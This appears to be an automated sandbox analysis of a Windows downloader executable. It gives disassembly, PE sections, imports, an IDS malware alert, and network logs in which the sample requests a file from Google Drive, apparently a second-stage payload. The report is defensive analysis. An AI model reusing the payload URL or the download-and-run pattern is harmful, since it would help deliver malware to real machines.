                                                      • CN="Whiskyernes Bawdrick ", E=Halvbrdrene@Mejslingens.Gas, L=Noyelles-sous-Lens, S=Hauts-de-France, C=FR
                                                      Version:3
                                                      Thumbprint MD5:6AB90C8B225664731A8B54D6E40103F4
                                                      Thumbprint SHA-1:5E84FE3B8249EB518C15A7F2DB80750FA72EA947
                                                      Thumbprint SHA-256:8BE0554365D7BACBD9F6AA46974380476F7408D28C796D6C44B49C58233A5089
                                                      Serial:149E8B9BEE100D92F5680896840913AA028289AE
                                                      Instruction
                                                      sub esp, 00000184h
                                                      push ebx
                                                      push esi
                                                      push edi
                                                      xor ebx, ebx
                                                      push 00008001h
                                                      mov dword ptr [esp+18h], ebx
                                                      mov dword ptr [esp+10h], 0040A198h
                                                      mov dword ptr [esp+20h], ebx
                                                      mov byte ptr [esp+14h], 00000020h
                                                      call dword ptr [004080B8h]
                                                      call dword ptr [004080BCh]
                                                      and eax, BFFFFFFFh
                                                      cmp ax, 00000006h
                                                      mov dword ptr [0042F42Ch], eax
                                                      je 00007F5AC50C3783h
                                                      push ebx
                                                      call 00007F5AC50C68E6h
                                                      cmp eax, ebx
                                                      je 00007F5AC50C3779h
                                                      push 00000C00h
                                                      call eax
                                                      mov esi, 004082A0h
                                                      push esi
                                                      call 00007F5AC50C6862h
                                                      push esi
                                                      call dword ptr [004080CCh]
                                                      lea esi, dword ptr [esi+eax+01h]
                                                      cmp byte ptr [esi], bl
                                                      jne 00007F5AC50C375Dh
                                                      push 0000000Bh
                                                      call 00007F5AC50C68BAh
                                                      push 00000009h
                                                      call 00007F5AC50C68B3h
                                                      push 00000007h
                                                      mov dword ptr [0042F424h], eax
                                                      call 00007F5AC50C68A7h
                                                      cmp eax, ebx
                                                      je 00007F5AC50C3781h
                                                      push 0000001Eh
                                                      call eax
                                                      test eax, eax
                                                      je 00007F5AC50C3779h
                                                      or byte ptr [0042F42Fh], 00000040h
                                                      push ebp
                                                      call dword ptr [00408038h]
                                                      push ebx
                                                      call dword ptr [00408288h]
                                                      mov dword ptr [0042F4F8h], eax
                                                      push ebx
                                                      lea eax, dword ptr [esp+38h]
                                                      push 00000160h
                                                      push eax
                                                      push ebx
                                                      push 00429850h
                                                      call dword ptr [0040816Ch]
                                                      push 0040A188h
                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x41dd0.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xd73e80x13b0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x64570x6600f6e38befa56abea7a550141c731da779False0.6682368259803921data6.434985703212657IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x80000x13800x1400569269e9338b2e8ce268ead1326e2b0bFalse0.4625data5.2610038973135005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xa0000x255380x60017edd496e40111b5a48947c480fda13cFalse0.4635416666666667data4.133728555004788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .ndata0x300000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x580000x41dd00x41e0051f103b856396aac282c5bd5a24beff1False0.6063619248102466data5.8960782160116745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0x583b80x130caPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.998410786148207
                                                      RT_ICON0x6b4880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.40775464332189754
                                                      RT_ICON0x7bcb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.4554866512507883
                                                      RT_ICON0x851580x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.462218045112782
                                                      RT_ICON0x8b9400x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4729667282809612
                                                      RT_ICON0x90dc80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.46835144071799717
                                                      RT_ICON0x94ff00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5149377593360995
                                                      RT_ICON0x975980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5457317073170732
                                                      RT_ICON0x986400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6073770491803279
                                                      RT_ICON0x98fc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6719858156028369
                                                      RT_DIALOG0x994300x100dataEnglishUnited States0.5234375
                                                      RT_DIALOG0x995300x11cdataEnglishUnited States0.6056338028169014
                                                      RT_DIALOG0x996500xc4dataEnglishUnited States0.5918367346938775
                                                      RT_DIALOG0x997180x60dataEnglishUnited States0.7291666666666666
                                                      RT_GROUP_ICON0x997780x92Targa image data - Map 32 x 12490 x 1 +1EnglishUnited States0.7191780821917808
                                                      RT_VERSION0x998100x27cdataEnglishUnited States0.5
                                                      RT_MANIFEST0x99a900x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                      DLLImport
                                                      ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                      SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                      ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                      USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-12-05T12:55:55.500067+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.450002172.217.19.174443TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 5, 2024 12:55:52.822628021 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:52.822681904 CET44350002172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:55:52.822778940 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:52.898159981 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:52.898195028 CET44350002172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:55:54.595639944 CET44350002172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:55:54.595762014 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:54.596508026 CET44350002172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:55:54.596585989 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:54.655137062 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:54.655178070 CET44350002172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:55:54.655599117 CET44350002172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:55:54.657984972 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:54.686876059 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:54.727328062 CET44350002172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:55:55.500067949 CET44350002172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:55:55.500161886 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:55.500869036 CET44350002172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:55:55.500922918 CET44350002172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:55:55.501017094 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:55.501017094 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:55.503484011 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:55.503506899 CET44350002172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:55:55.503515959 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:55.503570080 CET50002443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:55.759268045 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:55.759354115 CET44350003142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:55:55.759460926 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:55.763134956 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:55.763151884 CET44350003142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:55:57.475378990 CET44350003142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:55:57.475440979 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:57.479199886 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:57.479207993 CET44350003142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:55:57.479468107 CET44350003142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:55:57.479517937 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:57.484215021 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:57.531333923 CET44350003142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:55:58.403404951 CET44350003142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:55:58.403450012 CET44350003142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:55:58.403492928 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:58.403503895 CET44350003142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:55:58.403515100 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:58.403542995 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:58.403963089 CET44350003142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:55:58.404009104 CET44350003142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:55:58.404020071 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:58.404052973 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:58.425241947 CET50003443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:55:58.425271034 CET44350003142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:55:58.531121969 CET50004443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:58.531187057 CET44350004172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:55:58.531335115 CET50004443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:58.532222986 CET50004443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:55:58.532238960 CET44350004172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:00.224908113 CET44350004172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:00.225025892 CET50004443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:00.225564003 CET50004443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:00.225575924 CET44350004172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:00.225756884 CET50004443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:00.225761890 CET44350004172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:01.124424934 CET44350004172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:01.124481916 CET50004443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:01.124515057 CET44350004172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:01.124526978 CET44350004172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:01.124550104 CET50004443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:01.124576092 CET50004443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:01.125825882 CET50004443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:01.125844002 CET44350004172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:01.151371956 CET50005443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:01.151424885 CET44350005142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:56:01.151495934 CET50005443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:01.151772022 CET50005443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:01.151784897 CET44350005142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:56:02.848846912 CET44350005142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:56:02.849164009 CET50005443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:02.850114107 CET50005443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:02.850123882 CET44350005142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:56:02.850315094 CET50005443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:02.850320101 CET44350005142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:56:03.786989927 CET44350005142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:56:03.787033081 CET44350005142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:56:03.787106037 CET50005443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:03.787137032 CET44350005142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:56:03.787147045 CET50005443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:03.787976027 CET50005443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:03.788038969 CET50005443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:03.788084030 CET44350005142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:56:03.788135052 CET50005443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:03.910142899 CET50006443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:03.910186052 CET44350006172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:03.910248041 CET50006443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:03.910984039 CET50006443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:03.911000967 CET44350006172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:05.606267929 CET44350006172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:05.606343031 CET50006443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:05.606730938 CET50006443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:05.606739998 CET44350006172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:05.606888056 CET50006443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:05.606893063 CET44350006172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:06.517471075 CET44350006172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:06.517689943 CET50006443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:06.517723083 CET44350006172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:06.517765999 CET50006443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:06.517818928 CET50006443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:06.517883062 CET44350006172.217.19.174192.168.2.4
                                                      Dec 5, 2024 12:56:06.518012047 CET50006443192.168.2.4172.217.19.174
                                                      Dec 5, 2024 12:56:06.526207924 CET50007443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:06.526251078 CET44350007142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:56:06.526328087 CET50007443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:06.526552916 CET50007443192.168.2.4142.250.181.1
                                                      Dec 5, 2024 12:56:06.526565075 CET44350007142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:56:08.220130920 CET44350007142.250.181.1192.168.2.4
                                                      Dec 5, 2024 12:56:08.220196962 CET50007443192.168.2.4142.250.181.1
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 5, 2024 12:55:52.535543919 CET5708753192.168.2.41.1.1.1
                                                      Dec 5, 2024 12:55:52.677829027 CET53570871.1.1.1192.168.2.4
                                                      Dec 5, 2024 12:55:55.518430948 CET5358353192.168.2.41.1.1.1
                                                      Dec 5, 2024 12:55:55.750999928 CET53535831.1.1.1192.168.2.4
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 5, 2024 12:55:52.535543919 CET192.168.2.41.1.1.10xe2c9Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                      Dec 5, 2024 12:55:55.518430948 CET192.168.2.41.1.1.10xa1e7Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 5, 2024 12:55:52.677829027 CET1.1.1.1192.168.2.40xe2c9No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                      Dec 5, 2024 12:55:55.750999928 CET1.1.1.1192.168.2.40xa1e7No error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                      • drive.google.com
                                                      • drive.usercontent.google.com
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.450002172.217.19.1744432000C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-05 11:55:54 UTC216OUTGET /uc?export=download&id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      2024-12-05 11:55:55 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Thu, 05 Dec 2024 11:55:55 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-aAVfD_4GEoyX8n7KTxnasQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.450003142.250.181.14432000C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-05 11:55:57 UTC258OUTGET /download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      2024-12-05 11:55:58 UTC2228INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Thu, 05 Dec 2024 11:55:58 GMT
                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                      Content-Security-Policy: script-src 'nonce-2fyixl7P8-t7gh8bHRxbYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      X-GUploader-UploadID: AFiumC7pJwLE_W8xn8o7a8vBoCF5pMdC_1qKxVVUTzef6v1Re-LlIpsUBGxHTAnuDJrfleYnNJeoHbV1Iw
                                                      Server: UploadServer
                                                      Set-Cookie: NID=519=H9rK_crz2WB83cCqsHhDj-cAY6QK7jJUAzR0XnxSLC6OqUBXGsUdPqsL5MJxcLKiee7jvv3Lftb6O_JcLYQEaMOxANFO3sog_YNSLmStqNfqxpUjXIVWWCKuyFmQO5YijP0T60AUhkxr-_nfLmnhdET-TSTJImWfQAua6H8z3Ygop8B3YNy9W-4; expires=Fri, 06-Jun-2025 11:55:58 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2024-12-05 11:55:58 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 67 68 79 49 54 42 32 6f 7a 59 36 55 62 36 77 4a 79 4f 5a 4b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5ghyITB2ozY6Ub6wJyOZKA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.450004172.217.19.1744432000C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-05 11:56:00 UTC417OUTGET /uc?export=download&id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=519=H9rK_crz2WB83cCqsHhDj-cAY6QK7jJUAzR0XnxSLC6OqUBXGsUdPqsL5MJxcLKiee7jvv3Lftb6O_JcLYQEaMOxANFO3sog_YNSLmStqNfqxpUjXIVWWCKuyFmQO5YijP0T60AUhkxr-_nfLmnhdET-TSTJImWfQAua6H8z3Ygop8B3YNy9W-4
